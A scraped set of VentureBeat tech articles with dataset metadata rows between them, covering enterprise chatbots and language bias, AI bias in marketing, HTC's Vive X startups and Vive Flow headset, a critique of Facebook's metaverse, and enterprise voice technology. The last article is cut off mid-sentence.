that is due to the fact that we’ve experienced isolation as a result of a pandemic, but it also points to the need to scale up business,” Bennett said. “It may not necessarily be that businesses got the idea because of the pandemic, but rather the pandemic accelerated their timeline.” One example is Lee’s Famous Recipe Chicken Restaurant in Englewood, Ohio, which partnered with startup Hi Auto to build a conversational AI experience for its drive-thru customers. As a result of the pandemic, drive-thru orders in the U.S. saw an uptick of 22% in 2020. Consequently, drive-thru wait times increased by an average of 30 seconds , putting additional strain on employees. Hi Auto worked with Lee’s on a solution to the challenge. At the restaurant, the company’s chatbot greets guests, answers questions, suggests menu items, and enters orders into the point-of-sale system. If a customer asks an unrelated question — or requests something that’s not on the menu — the chatbot automatically hands them off to a human. It also integrates with Lee’s employee headsets, allowing employees to provide real-time updates to inventory, as needed. Lee’s plans to implement the chatbot at more of its drive-thrus, and Hi Auto says pilots with other restaurants are underway. “The automated AI drive-thru has impacted my business in a simple way. We don’t have customers waiting anymore — we greet them as soon as they get to the board, and the order is taken correctly,” Lee’s owner Chuck Doran said. “We see improvements in our average check, service time, and improvements in consistency and customer service. And because the cashier is now less stressed, [they] can focus on customer service as well.” Internal use cases Chatbots can have value beyond customer service. For example, they can assist in the employee onboarding process, fielding screening questions, recording answers, and guiding new employees through company policies and protocols. Chatbots can also address common problems, which gives IT service desk agents the opportunity to fix more complicated issues. Salesforce took a step toward addressing these use cases last year, according to Bennett, with the introduction of the Einstein bot intro template. Available in beta, the intro template lets developers create chatbots for onboarding, with popular Salesforce actions like creating a case or a lead, looking up an order, and adding a comment to an existing case. “Companies can take this baseline conversation design and customize it to fit their needs. That’s really what we’re seeing — we’re seeing a shortened time between developing and deploying chatbots,” Bennett said. The data bears this out. According to a McKinsey survey , at least a third of activities could be automated in about 60% of occupations. And in its recent Trends in Workflow Automation report , Salesforce found that 95% of IT leaders are prioritizing workflow automation technologies like chatbots, with 70% seeing the equivalent of more than four hours of savings per employee each week. Challenges in design Asked about trends in the chatbot industry, Bennett pointed to growing awareness of inclusive approaches to design. He’s worked with teams at Salesforce to ensure chatbots don’t discriminate against certain vernaculars, like African-American English or Chicano English. “We ask ourselves, how can we make sure that, for example, a Black woman from the South in the U.S. doesn’t have to change their language in order to get the chatbot to react in the way that they don’t expect? We as research scientists, designers, product managers, and engineers have a responsibility to not only think about the bottom line, but also think about a total addressable market and consider the users that are being left behind.” Natural language models are the building blocks of apps, including chatbots. But growing evidence shows that these models risk reinforcing undesirable stereotypes , mostly because a portion of the training data is commonly sourced from communities with prejudices around gender, race, and religion. Detoxification has been proposed as a fix for this problem, but the coauthors of newer research suggest even this technique can amplify rather than mitigate biases. The increasing attention on language biases comes as some within the AI community call for greater consideration of the effects of social hierarchies like racism. In a paper published last June, Microsoft researchers advocated for a closer examination and exploration of the relationships between language, power, and prejudice in their work. The paper also concluded that the research field generally lacks clear descriptions of bias and fails to explain how, why, and to whom specific bias is harmful. “As a linguist, I look at conversation as really the fabric or the currency with which we negotiate relationships in society. Technology has now reached a point where this sort of traditionally human behavior — conversation — is something machines can partake in,” Bennett said. “The challenge now is to design a chatbot in such a way that that it adheres to human expectations about what was once an exclusively human behavior.” Potential solutions Bennett suggests one solution to models’ shortcomings might be developing tools for customers to evaluate quality. He points to Robustness Gym , a framework developed by Salesforce’s natural language processing group, which aims to unify the patchwork of existing robustness libraries to accelerate the development of novel natural language model testing strategies. CheckList — from Amazon, Google, and Microsoft — takes a task-agnostic approach to model benchmarking, allowing people to create tests that fill cells in a spreadsheet-like matrix with capabilities and test types, along with visualizations and other resources. In a recent paper submitted to the Association for Computational Linguistics (ACL) 2021 conference (“Reliability Testing for Natural Language Processing Systems”), Bennett and Kathy Baxter, Salesforce’s principal architect of ethical AI, argue for reliability testing and contextualization to improve accountability. They explain that reliability testing, with an emphasis on interdisciplinary collaboration, will enable rigorous and targeted testing, aiding in the enactment and enforcement of industry standards. Bennett also advocates including key stakeholders throughout the chatbot design process so biases can be accounted for and mitigated — at least to the extent possible. A recent attempt at this is the Masakhane project , a grassroots organization of 400 researchers from 30 African countries (and three countries outside Africa) whose mission is to strengthen natural language research in African languages. As of February 2020, the group has published on GitHub more than 49 translation results for over 38 African languages, many of which had never been translated at scale. “Any institution has the opportunity to use a chatbot to essentially extend itself in a relationship with a customer — with prospective students, with job applicants, the list goes on. These are opportunities to create relationships and have a meaningful exchange,” Bennett said. “There’s a linguistic reason why someone uses a period versus an exclamation mark or emojis versus not. These things convey additional meaning about the state of the relationship at hand, which is the kind of thing that will continue to be really important on the product and engineering side. With chatbots, we need to think through the conversational aspects of the conversation besides everything about the text, whether the bot or the user takes the first turn.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,160
2,022
"5 steps to minimize AI bias in marketing | VentureBeat"
"https://venturebeat.com/2022/02/20/5-steps-to-minimize-ai-bias-in-marketing"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest 5 steps to minimize AI bias in marketing Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Today, more and more marketing tools are AI-powered. As that shift has occurred, marketers are grappling with the fact that there will always be some form of unintentional algorithmic bias affecting those platforms. The bias is programmed even without data science teams realizing it, making it difficult to detect and resolve. As marketers, we inherit the biases in the algorithms we use for advertising, whether they’re algorithms we build or buy. Thus, it’s important to develop concrete steps to ensure minimal bias in the algorithms we use, whether it’s your own AI or AI solution from vendors. AI, particularly machine learning, already enhances a wide range of marketing solutions including hypersegmentation, dynamic creative, inventory quality filtering, dynamic sites, and landing pages. But there are lots of things that can get in the way of an algorithm’s success. When bias sneaks into AI, it can wreak havoc on efforts and campaigns in a variety of ways. This often happens because marketers have better or more data about some situations or customers than others, and that leads an algorithm toward being more accurate for the ones with greater data volume. Here are some common examples: We all want to “conquest” competitors’ customers, but marketers usually have better information about existing customers than future prospects. As a result, there can be a fair amount of risk that those algorithms are inherently more successful at finding people just like their current customers. Many marketers segment and target high-value customers. Since there is likely to be fewer of those, algorithms are typically trained mostly on data from the more common, lower-value customers. Consequently, those algorithms prove to be biased toward finding lower-value customers, hurting efforts overall. Marketers may have trouble optimizing marketing for late-adopting customers when early adopters make up most of the customer base for a newer product. This can easily occur, because it’s primarily the early adopters’ data that will be used to train the algorithm. Marketers might inadvertently prioritize inventory on shorter tail apps because the algorithms we use for bid optimization had more training data from those apps than from others. A key lesson here is that we can’t take AI algorithms at face value — and they’re certainly not infallible. Along with the new technology and new capabilities comes a new set of concerns to be aware of. Marketers need to ask a lot of questions — about everything from the motivations of the company selling the AI, to where the training data is coming from. We need to look at ourselves too, knowing that we bring biases to our interpretations based on our personal experience. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Here are five concrete steps to take to ensure your AI isn’t overly biased: 1. Get involved and stay involved. Constant human involvement with AI is crucial. Question all assumptions and compare human decisions to model decisions, digging into any differences or patterns you can find. As a marketer, make sure not to commit too early to a “set-and-forget” automation use case for AI, and instead periodically ensure the algorithm is working the way you want. 2. Use representative training data. For any and all groups you want in your marketing, make sure the training data is well represented by that group. Predict rare outcomes, such as conversions, more accurately by ensuring those outcomes are over-indexed in training data, which will make sure the algorithm has lots of examples of success for each. As a marketer evaluating a vendor, make sure you are comfortable that your vendor has taken steps to ensure data representativeness. 3. Look beneath the surface. When you’re measuring accuracy, don’t just focus on the performance of the algorithm overall, but also look at each individual subgroup, like platforms, genders, and high vs. low LTV customers. Otherwise, you might only end up with accurate projections for digital as opposed to TV advertising, or for publishers with which you already invest a lot of money, as opposed to those new to your brand, for example. 4. Continually pursue better data. Don’t ever settle. Keep looking for better training data and ensure that your vendors are following the same approach. Get more, go wider and try new things to collect and/or leverage data you can use to optimize. Whoever has the best, most thorough and accurate training data has a massive advantage. As a marketer evaluating a vendor, ask about the training data — it’s accuracy, where it comes from, how often it’s updated. It’s important to remember that the “best” training data isn’t necessarily the biggest data set. The strength of the training data is more dependent on quality than quantity. 5. Evaluate AI with a dose of skepticism. It’s a powerful tool that is playing an increasingly larger role in targeting, data accuracy, creative versioning, testing, and measurement. AI-driven solutions can help marketers work smarter and achieve exciting new things at greater scale. Like any other investment, you need to know what you need to do to avoid risk. When you invest in an AI-based solution, you need to ask about algorithmic bias. Once you adopt a solution, ask again … and again. Jake Moskowitz is Vice President of Data Strategy and Head of the Emodo Institute. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,161
2,016
"HTC shows off 20 virtual reality startups at its Vive X accelerator | VentureBeat"
"https://venturebeat.com/2016/12/07/htc-shows-off-20-virtual-reality-startups-at-its-vive-x-accelerator"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages HTC shows off 20 virtual reality startups at its Vive X accelerator Share on Facebook Share on X Share on LinkedIn Cher Wang, cofounder and chair of HTC. Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. HTC is all-in on the Vive virtual reality headset, and it is investing heavily in the companies that it is shepherding through its Vive X accelerator locations in San Francisco, Taipei, Shenzhen, and Beijing. Cher Wang, cofounder and chairperson of HTC, showed that commitment to VR at an event today, where the company showed off the first 20 startups that are going through its Vive X accelerator. “This is something that we never dreamed about, that I would be changing the world with every one of you,” Wang said. Marc Metis, global head of Vive X at HTC, also said that the company is moving boldly into investments in hardware, software, and services related to VR and augmented reality (AR). HTC has committed to investing more than $100 million in Vive X companies. He said that HTC received more than 1,200 applications for its first batch of accelerator companies this year. Nearly 40 companies have been accepted in the first batch, and HTC will be launching another batch of startups in February. HTC will also host demo days next week in Beijing and Taipei for other companies in the program. More than 100 venture capitalists and media were at the event on Wednesday in San Francisco. Event GamesBeat at the Game Awards We invite you to join us in LA for GamesBeat at the Game Awards event this December 7. Reserve your spot now as space is limited! “We are still looking for ecosystem boosters, a force multiplier whose success can lead to other company successes,” Metis said. “We are also looking for pain point solvers.” Here’s an overview of the 20 companies that presented: Kaleidoscope: A photorealistic rendering company that makes tools to create imagery in VR. It can be used for a wide range of applications, such as architectural or product visualization. Apmetrix: This company makes analytics for VR, so that you can see how many people looked at an ad or a particular part of a VR experience. Immersv: It is an ad network for VR, enabling companies to make money from advertisements in VR. Christine Lee of Immersv said that engagement numbers for VR ads run at 30 percent to 40 percent, or far higher than the 1 percent on mobile and 0.4 percent on desktop. Video ads show a 70 percent completion rate in VR, she said, far higher than on other platforms. Her company is working with companies across the board such as Warner Bros., Lionsgate, Gree, MZ, and Element Games. BreqLabs: The company has created a way to use ultrasonic sensors to detect your hand movements so that you can bring in your hands and fingers into VR and use them as control mechanisms. CEO Martin Labrecque said the company is raising a round of $600,000. SurrealVR: Arthur Goikhman, cofounder of SurrealVR, said his company has created a drop-in social VR framework that can make any VR experience social. SurrealVR comes with cross-platform support for avatars, voice chat, networked gameplay and physics, shopping and more. The company has more than 100,000 users so far, and it is profitable. It is also raising $5 million. Fulldive: It has created a smartphone-based VR navigation and content discovery platform. The vision is to make VR accessible to everyone, said CEO Giovanno Yosen Utomo. The company launched its platform for sorting through VR apps in January 2015, and it has been downloaded 2.5 million times. It has about 500,000 active users a month and 20,000 installs per day. Oben: The company has created a way to build personalized social avatars for AR and VR. Based in Los Angeles, its mission is to convert VR from a lonely experience to a social one. You customize your appearance, change your hair, and create something that you won’t be embarrassed about when you go into a business meeting in VR. Teemew: This is another startup creating a VR meeting solution in the hopes of eliminating travel costs and promoting real-time collaboration. LumiereVR: Cofounder Travis Wu named the company after the Lumiere brothers, who pioneered film. He wants to do the same for VR films. The company has in-house filmmaking technology and access to artists who want to create new kinds of films. The company will distribute its films through the distribution channels of its Chinese partners. Clevr: This is another company creating a social layer in VR. Clevr wants to unite your social across all devices, including VR, and add a layer of discovery through various viral channels. CEO Japheth Dillman said you’ll be able to join friends in content apps, chat in a VR room, and discover new apps. Metaverse Channel: This company has created an interactive educational platform that utilizes VR’s immersive technology to accelerate learning. Its mission is to inspire and educate the minds of today by resurrecting the greatest minds from the past. It will have things like virtual field tips and tutorials. Shortfuse Game Studios: This company is making a shooter game so you can have firefights in VR arcades (aka VRcades). Shortfuse wants to create shooter games that will become esports crazes in VR. AppMagics: AppMagics is a mixed-reality content generation and interactive platform with VR live streaming. The company is in 140,000 Internet cafes. Augmented Intelligence: CEO Sam Jang said he wants to create acupuncture in VR. Augmented Intelligence is all about fostering the medical platform in acupuncture and human anatomy. The goal is to provide better understanding and treatment of human bodies through virtual training and simulation from medical partners. Metaverse Technology: CEO Steve Hsia said his team loves “guns and VR tech.” The company is taking “shooting sports” such as Airsoft, paintball, and gun-range shooting to VR. He noted the U.S. has big audiences for shooting sports, gun ownership, and first-person shooters, and his startup hopes to unify all of those markets through both single-player and multiplayer competitions. Directive Games: The company is creating online competitive multiplayer games for VR. Drop: This startup provides a 3D and immersive Internet search experience for virtual users. Fishbowl VR: The company provides crowdsourced testing and user insights to help content creators figure out what works and what doesn’t in virtual reality. Lyra VR: It provides an innovative and fantastical way to create, perform, and immerse oneself in music, allowing for VR music creation with “visual symphonies” and collaboration to popular media devices. Opaque Studios: This combines the two most exciting fields in tech and Hollywood — VR and virtual production — to enable directors of feature films, episodic TV, games, and VR to visualize virtual performances with the immediacy of live action. GamesBeat's creed when covering the game industry is "where passion meets business." What does this mean? We want to tell you how the news matters to you -- not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,162
2,021
"HTC unveils portable Vive Flow immersive glasses for relaxation | VentureBeat"
"https://venturebeat.com/2021/10/14/htc-unveils-portable-vive-flow-immersive-glasses-for-relaxation"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Preview HTC unveils portable Vive Flow immersive glasses for relaxation Share on Facebook Share on X Share on LinkedIn HTC Vive Flow is aimed at helping you relax. Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. HTC is taking virtual reality in a new direction today with the portable Vive Flow immersive glasses. The Vive Flow looks more like compact and lightweight augmented reality glasses, but it has a wrap-around cloth barrier that creates your own personal VR enclosure. As such, the glasses are a kind of hybrid between AR and VR, and they’re meant to be worn for a longer time so that people can use them to find moments to relax, refresh, and restore. Designed with comfort and portability in mind, Vive Flow lets people find moments of calm and well-being for themselves throughout the day, including meditating with apps like Tripp, or taking a scenic, immersive drive down Route 66 with MyndVR’s original series: A Road to Remember. Overall, I thought the device was very well done. Above: You can connect your Vive Flow to a power source and wirelessly to your smartphone. Kuen Chang, head of creative labs at HTC Vive, showed me a demo unit that I wore on my head. Like other VR headsets, it transported me to another world where I got to use relaxing apps like Tripp. The glasses are very lightweight and the seal is pretty good with the cloth liners on the side of the glasses. That means no light gets in from the outside to disturb you in your own personal cinema. The glasses were plugged in via a USB-C wire to a battery, and the glasses synced with apps on an Android smartphone. The Vive Flow weighs 6.6 ounces, or about as much as a chocolate bar. Event GamesBeat at the Game Awards We invite you to join us in LA for GamesBeat at the Game Awards event this December 7. Reserve your spot now as space is limited! You can watch TV or movies on their own personal, cinema-sized VR screen. You can exercise your mind with brain training apps, or collaborate and socialize with colleagues and friends on Vive Sync. Above: HTC Vive Flow helps you meditate. “With Vive Flow, HTC is taking technology in a new direction, focusing not on what we do, but on how we feel,” said HTC CEO Cher Wang, in a statement. “Maintaining our wellness has come to the forefront in the last few years, with so many millions feeling stressed every day, so it has never been more important to take time out to calm our minds, and Vive Flow provides the perfect opportunity to escape our four walls and immerse ourselves in our ideal ambience.” The Vive Flow will be available in November for $500. A 5G Android smartphone is required. I tried out the XR wellness app from Tripp, which was started by CEO Nanea Reeves to help people meditate. It was a pretty amazing experience, with lots of fluid movement and pretty lighting. It was like being in VR with a school of fish around me. Very relaxing. With Vive Flow, you can dive into a range of immersive experiences via the Viveport app store anytime, anywhere, using your Android smartphone as a controller. You can connect wirelessly to an Android 5G smartphone and stream content like TV shows and films from your favorite platforms. For mirroring premium video like TV and film content from an Android smartphone, the device must support HDCP 2.2. Above: HTC Vive Flow costs $500. And you can meet with friends in realistic virtual environments via Vive Sync. The glasses frame has a dual-hinge design and soft face gasket allow it to fold down into a compact footprint for portability. Vive Flow’s hinge is designed to fit many different head shapes and sizes. Its face gasket takes inspiration from the acclaimed Vive Focus 3, with magnetic connections making it simple and quick to swap out — perfect for when you want to share. Vive Flow also has built-in diopter dials, allowing users to easily make adjustments for crystal clear visuals. Its active cooling system pulls warm air away from your face, keeping you comfortable throughout the day. I thought this was an awesome part of the glasses. I wear prescription glasses, and I usually find VR headsets to be uncomfortable, so much so that I remove my glasses and can’t see as well. But the dials enable me to find something close to my glasses prescription and see more clearly. Since the dials have numbers on them, you can easily remember the right setting for each eye. You can pull out the magnetic face plate and wash the surface if you need to. Above: HTC Vive Flow ships in November. If anything was difficult to do, it was using the smartphone as a controller. I tapped on the screen but sometimes it didn’t detect my touch. So I had to repeat that a few times until it recognized what I was trying to do. The Vive Flow has an expansive 100-degree field of view allows for cinematic screens to lose yourself in HD quality content, with a sharp 3.2K resolution and a smooth 75 Hz refresh rate. Featuring full 3D spatial audio, Vive Flow delivers immersive sound and can also connect to external Bluetooth earphones. You can buy a 10,000 Ah Vive power bank separately. That gives you around four or five hours of battery life. HTC Vive is also unveiling a special Viveport subscription plan following the launch of Vive Flow. The plan is priced at $6 per month and gives people unlimited access to a wide range of immersive apps covering well-being, brain training, productivity, light gaming, and exclusive content like a Lo-Fi room designed to look and feel like a cozy café. Pre-orders start today. GamesBeat's creed when covering the game industry is "where passion meets business." What does this mean? We want to tell you how the news matters to you -- not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it. Discover our Briefings. Join the GamesBeat community! Enjoy access to special events, private newsletters and more. VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,163
2,021
"Facebook’s vision of the metaverse has a critical flaw | VentureBeat"
"https://venturebeat.com/2021/09/12/facebooks-vision-of-the-metaverse-has-a-critical-flaw"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest Facebook’s vision of the metaverse has a critical flaw Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. The “metaverse” is back in the headlines. Mark Zuckerberg recently announced that Facebook “will effectively transition from … being a social media company to being a metaverse company. ” Facebook plans to create “an embodied internet” — powered by its Oculus headsets and bridging the company’s platforms in virtual space. And Facebook is not alone, as Epic Games , Disney , and other corporations are also investing billions in their virtual worlds. Is this metaverse talk exciting? Sure. Is this new? Hardly. The term metaverse is nearly 40 years old. Coined by sci-fi author Neal Stephenson in his 1992 novel Snow Crash , the metaverse was his name for the convergence of physical reality and virtual space. The idea was a persistent, shared environment that blurred the digital and physical for everyone who entered it. This concept is just as enticing today as it was back in 1992, but why are big players in gaming and technology rediscovering the metaverse today? The generational shift driving big tech to the metaverse My son just turned 11, and among his presents was a small cash gift from his grandfather. Since he was free to burn this birthday money on anything he wanted, I couldn’t wait to see what he’d buy. So imagine my reaction when he decided to purchase new skins for his Call of Duty avatar. Pixels rendered on a screen? Seriously? I gently asked if he was sure he wanted to buy something digital that couldn’t be removed from the PC. Without hesitation, he responded “Yes!” And once he’d bought and added his new skins for the game, he wanted to show it off to me, his mom, his siblings … and of course, everyone he played with online. Event GamesBeat at the Game Awards We invite you to join us in LA for GamesBeat at the Game Awards event this December 7. Reserve your spot now as space is limited! I tell this story to illustrate the generational shift driving Big Tech’s rediscovery of the metaverse: Younger people are more than willing to pay real money for entirely virtual items. And it’s not just kids and teenagers — the explosion of interest in Non-Fungible Tokens (NFTs) represents the grown-up version of unique virtual goods having real cash value. While NFTs can be essentially anything digital, they’re usually digital art or memorabilia like Jack Dorsey’s first tweet (which sold for $3 million). So why are all these digital goods worth actual money to their buyers? The same reason my son wanted to show off his shiny new pixels to everyone who would listen: The value of digital goods comes from as many people as possible seeing that you have them. Put in terms my older generation could understand, you don’t buy a Ferrari because you need to get places fast. You buy a Ferrari because it looks amazing and you want to look amazing in it. Without a crowd of gawking onlookers, it’s just a fast (and costly!) car, not the status symbol it is meant to be. What Facebook doesn’t understand about the metaverse The growing real-world value of digital items helps explain why the metaverse is back in vogue, but we must remember the foundation of value for these digital items is social. Without a large audience to gaze upon your avatar skins or NFTs, these items are just unseen pixels on a screen. And to maximize the audience for digital goods, the metaverse must be open and cross-platform. Otherwise, these digital goods are like a Ferrari buried under junk in your garage. This need for an open, cross-platform experience is why Facebook’s metaverse initiatives will fail. Everything Facebook does is inside a closed experience controlled by their engineers and admins. Even if you want to use your Oculus headset to access a third-party virtual reality app, you must sign in with a Facebook account. I understand why the company does this, as its lifeblood is unfettered access to user data. Zuckerberg probably sees this metaverse expansion as a way to more fully immerse his userbase into Facebook and get even more data and dollars from them. However, Facebook’s ethos of top-down control is the exact opposite of what a thriving metaverse needs. Imagine the reactions of people like my son who want to show off new skins for their metaverse avatars, only to discover their friends outside Facebook can’t see them and they’d only get responses from Facebook’s custom-built echo chamber. It’s safe to assume from Facebook’s history that the company will always prioritize a tightly controlled environment over an open metaverse. In short, do we really want a metaverse owned by Facebook — or anyone? Imagining a better metaverse I don’t write this to join the online pile-on criticizing Facebook’s metaverse vision but because I’m legitimately excited by the potential of metaverse technology. My company has a ton of customers creating VR and AR applications. I’ve seen firsthand how engaging it can be to layer a heads-up display on a HoloLens for engineering work or to add AR targets to run over during an electric scooter ride. I’ve also seen how sad and isolating an empty virtual world can be when there’s no one in it besides internal testers. As we imagine a better metaverse, here are three core principles it must have: The metaverse is open, not closed. The more our digital worlds are cross-platform and inclusive to everyone interested in experiencing them, the richer and more engaging they will be. The metaverse is an expansion of the physical world, not a retreat from it. While I enjoyed the movie “Ready Player One,” there’s much more promise in a metaverse that layers new meaning onto our shared physical existence than one that encourages us to play VR games inside a dark, enclosed room. The metaverse should connect people, not divide them. For an open and inclusive platform to work, it needs a strong community that draws people in and welcomes them — while actively resisting trolls and other bad actors trying to stir up dissension. As younger generations embrace a more digital world and drive investment in the metaverse, I don’t want to be a skeptical old guy who misses out on the fun. Instead, I want companies like mine to take seriously their responsibility to make this new world the best it can be. Instead of only building a metaverse we can control and profit from, let’s make one that’s better than the world we have now — open, expansive, and connective. Jerod Venema is the founder and CEO of real-time video communication company LiveSwitch , which counts UPS, Match.com, Bosch, and WWE among its customers. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,164
2,021
"Voice tech makes inroads in the enterprise | VentureBeat"
"https://venturebeat.com/2021/07/04/voice-tech-makes-inroads-in-the-enterprise"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest Voice tech makes inroads in the enterprise Share on Facebook Share on X Share on LinkedIn Beyond Verbal Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. [Story updated 7/8/2021 to correct Gong’s valuation based on its recent funding.] Some good news, bad news for voice technology partisans in the workplace: The bad news is that the dream of a voice assistant in every conference room and on every desk hasn’t come to pass. The good news is that voice technology is still having an impact in business, just outside of white-collar workplaces. Voice assistants have never taken hold in the office. In 2017, Amazon announced Alexa for Business. In the official announcement, the company outlined use cases like starting meetings in conference rooms or asking for information around the office. While Amazon hasn’t released detailed stats on Alexa for Business adoption, even Amazon partners haven’t all jumped in. WeWork paused its partnership , and Ajoy Krishnamoorthy of Acumatica said they have seen concerns around security. And this was all before offices became a place that sat empty while workers stayed home. Voice technology has seen adoption in verticals such as farming, where companies like AgVoice , founded by farm owner and technologist Bruce Rasa, uses voice technology to improve data management. It claims to have a 50% improvement in performance. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Voice assistants are making warehouse work more efficient, as well. While voice picking has been around for decades, improvements in speech recognition and NLU (natural-language understanding) technology have increased the effectiveness and the uptake of voice. In retail, you can’t get any bigger adoption than Wal-Mart, and it is likewise bringing a voice assistant into its stores via the Ask Sam voice app. The app is a voice-driven tool for employees that brings together information like employee schedules, stock information, and even recipes. Wal-Mart says that this keeps employees on the floor, instead of needing to go find a computer to look up information. We see, then, that there are fields where voice technology is making an impact, and we haven’t even touched on hospitality or the medical field. But what about back in the enterprise? In many ways, voice assistants didn’t revolutionize the enterprise because there was a solution but not a problem. The dream of asking Alexa for sales numbers isn’t that useful when you have your CRM open in the browser on your laptop all day. Yet voice technology is still having a major impact on the enterprise, just not packaged as an assistant. Companies like Chorus.ai and Gong are using speech recognition and natural language understanding to give sales teams insights into their performance, with significant traction, including a $7.25 billion valuation for Gong. Customer support is another domain in which voice technology is having an impact on the enterprise bottom line. Google continues to invest in contact center voice technology via Dialogflow and its Contact Center AI. Its virtual agent technology is indeed an assistant of sorts, just one narrowly scoped for customer support, with an eye towards helping customers self-serve their problems and leave humans to handle the thornier requests. While NLU and speech recognition technology became good enough to enable smart assistants, these smart assistants and the competition between companies like Google, Amazon, Microsoft, and Apple, in turn improved NLU, speech recognition, and semantic understanding technologies. Tech that a 